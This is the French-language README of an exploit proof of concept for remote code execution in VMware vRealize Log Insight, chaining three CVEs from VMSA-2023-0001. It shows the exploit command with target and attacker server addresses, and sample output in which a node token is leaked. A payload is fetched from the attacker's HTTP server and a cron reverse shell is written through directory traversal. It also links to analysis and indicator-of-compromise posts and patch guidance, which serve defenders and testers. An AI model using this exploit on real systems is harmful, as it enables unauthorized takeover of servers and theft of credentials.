
POC pour RCE utilisant les vulnérabilités décrites dans VMSA-2023-0001
POC pour VMSA-2023-0001 affectant VMware vRealize Log Insight, qui inclut les CVE suivantes :
La configuration par défaut de cette vulnérabilité écrit une tâche cron pour créer un shell inverse. Assurez-vous de modifier le fichier payload pour l'adapter à votre environnement.
Une analyse technique de la cause racine de la vulnérabilité est disponible sur notre blog : https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive
Pour analyser les instances Log Insight à la recherche d'indicateurs de compromission, consultez notre blog IOC : https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
Ce POC abuse des différents points de terminaison RPC Thrift pour réaliser une écriture de fichier arbitraire.
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
Si vous utilisez un payload basé sur cron, assurez-vous que le fichier payload a les permissions et le propriétaire appropriés :
sudo chown root:root payload
sudo chmod 0644 payload
Mettez à jour vers la dernière version ou atténuez le risque en suivant les instructions du VMSA https://www.vmware.com/security/advisories/VMSA-2023-0001.html
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.